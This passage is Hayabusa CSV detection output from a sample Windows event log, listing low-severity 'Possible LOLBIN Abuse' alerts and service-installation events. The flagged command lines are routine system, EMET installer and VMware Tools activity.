LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 02:01:48.411 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xac0 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 02:01:48.594 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x1728 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 02:01:48.666 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xc08 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 02:03:48.398 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x14b8 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 02:09:30.260 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 02:09:39.134 
+09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x8e4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 02:10:01.474 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1720 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 02:26:02.115 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0xb0c | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:00:10.327 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x7f4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:05:18.971 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x12bc | User: IEUser | LID: 
0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:06:54.664 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x56c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:06:54.679 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{86D5EB8A-859F-4C7B-A76B-2BD819B7A850} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:39:28.543 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12e8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:39:28.691 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11e0 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:39:28.743 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa28 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:39:28.761 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17a4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:39:28.771 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xd08 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:39:28.809 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\applocker.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xebc | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:46:10.436 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1158 | User: IE10WIN7$ | LID: 
0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:46:27.488 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x14c8 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:46:27.704 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x2ec | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:47:09.257 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc48 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:47:09.370 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x16bc | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:01.641 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 
29CF125E202451A4ADA81BD9D0C1A3B7 | Path: C:\Windows\System32\msiexec.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:09.250 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 22A181542763035A5FF1244203DB5EDC E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe70 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:18.846 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xa48 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:20.301 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpPortSharing restricted | Path: C:\Windows\System32\sc.exe | PID: 0x13e8 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:20.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpPortSharing SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:20.355 
+09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Net.Tcp Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 05:48:20.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetTcpActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x9e4 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:20.379 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetTcpActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1558 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:20.416 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Net.Pipe Listener Adapter | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe | Account: NT AUTHORITY\LocalService | Start Type: disabled,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 05:48:20.426 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetPipeActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x1660 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:20.439 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetPipeActivator 
SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x1234 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:20.450 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Net.Msmq Listener Adapter | Path: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\SMSvcHost.exe"" -NetMsmqActivator | Account: NT AUTHORITY\NetworkService | Start Type: disabled",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 05:48:20.460 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sidtype NetMsmqActivator restricted | Path: C:\Windows\System32\sc.exe | PID: 0x968 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:20.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: privs NetMsmqActivator SeCreateGlobalPrivilege | Path: C:\Windows\System32\sc.exe | PID: 0x710 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:48:22.723 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: ASP.NET State Service | Path: %SystemRoot%\Microsoft.NET\Framework\v4.0.30319\aspnet_state.exe | Account: LocalSystem | Start Type: disabled,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 05:49:59.321 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: 
C:\Windows\System32\dllhost.exe | PID: 0x128c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:05.366 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup (1).msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0x17e4 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:05.541 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:19.219 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4DE932ADC1206E85CE03A5855ECF29FC | Path: C:\Windows\System32\msiexec.exe | PID: 0x434 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:19.686 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Microsoft EMET Service | Path: ""C:\Program Files\EMET 5.5\EMET_Service.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-02 05:50:19.909 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 
22F8D0F1805E128ED9C40EA3A4181C89 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xe78 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:20.040 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\microsoft\emet_up hklm\software\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:20.058 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""regsvr32.exe"" /s ""C:\Program Files\EMET 5.5\EMET_CE.DLL"" | Path: C:\Windows\System32\regsvr32.exe | PID: 0x17d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:20.147 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x13d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:20.214 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" copy hklm\software\policies\microsoft\emet_up hklm\software\policies\microsoft\emet /s /f | Path: C:\Windows\System32\reg.exe | PID: 0x17c0 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:50:20.258 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\reg.exe"" delete hklm\software\policies\microsoft\emet_up /f | Path: C:\Windows\System32\reg.exe | PID: 0x14cc | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:53:20.687 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1598 | User: IEUser | LID: 0x4d011",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:53:20.767 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xa1c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:53:20.804 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x364 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:53:20.815 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible 
LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf94 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 05:53:20.853 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\Win7-application.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1628 | User: IEUser | LID: 0x4cfe1",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 06:24:37.363 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x16d4 | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 06:24:37.378 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x148c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:08:33.005 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: IE10WIN7$ | LID: 
0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:08:33.233 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:08:33.396 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x175c | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 23:08:53.121 